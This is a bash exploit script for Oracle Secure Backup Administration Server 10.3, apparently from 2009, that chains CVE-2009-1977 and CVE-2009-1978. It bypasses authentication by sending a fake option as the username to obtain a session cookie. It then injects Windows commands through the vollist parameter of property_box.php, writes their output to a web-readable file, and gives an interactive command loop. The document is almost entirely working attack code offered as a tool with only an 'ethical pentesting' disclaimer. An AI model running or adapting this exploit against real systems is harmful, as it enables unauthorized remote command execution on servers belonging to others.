#!/bin/bash #Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability #1-day exploit for CVE-2009-1977 and CVE-2009-1978 #PoC script successfully tested on: #Oracle Secure Backup Server #MS Windows Professional XP SP3 #In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server. #Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart #authentication bypass and a trivial command injection, resulting in arbitrary command execution. #References: #http://www.zerodayinitiative.com/advisories/ZDI-09-058/ #http://www.zerodayinitiative.com/advisories/ZDI-09-059/ #Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool. #Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009 clear echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::" if [[ $# -ne 1 ]] then echo "usage: ./$(basename $0) " echo "i.e.: ./$(basename $0)" exit fi if ! which curl >/dev/null then echo "'curl' is required in order to handle HTTPS connections" exit fi TARGET=$1 #Exploiting CVE-2009-1977 and getting a valid token echo "[+] Exploiting CVE-2009-1977 against $TARGET" postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd" session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1` if [[ -z $session ]] then echo "[!] Fatal error. No valid token has been retrieved" exit fi echo "[+] I got a valid token: $session" #Use a valid session and CVE-2009-1978 in order to inject arbitrary commands echo "[+] Exploiting CVE-2009-1978 against $TARGET" shell="1%26ver>osb103shelltmp" curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft` if [[ -z $check ]] then echo "[!] Fatal error. I cannot execute arbitrary commands" exit fi echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything" echo echo \>$check while(true); do echo -n \> read -r cmd if [ "$cmd" == "EXIT" ] then echo "[+] Removing the temporary file and closing" shell="1%26del%20osb103shelltmp" curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null exit fi #URLencode function cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %` shell="1%26$cmd>osb103shelltmp" curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null echo "[+] Last successful command execution:" curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" done #end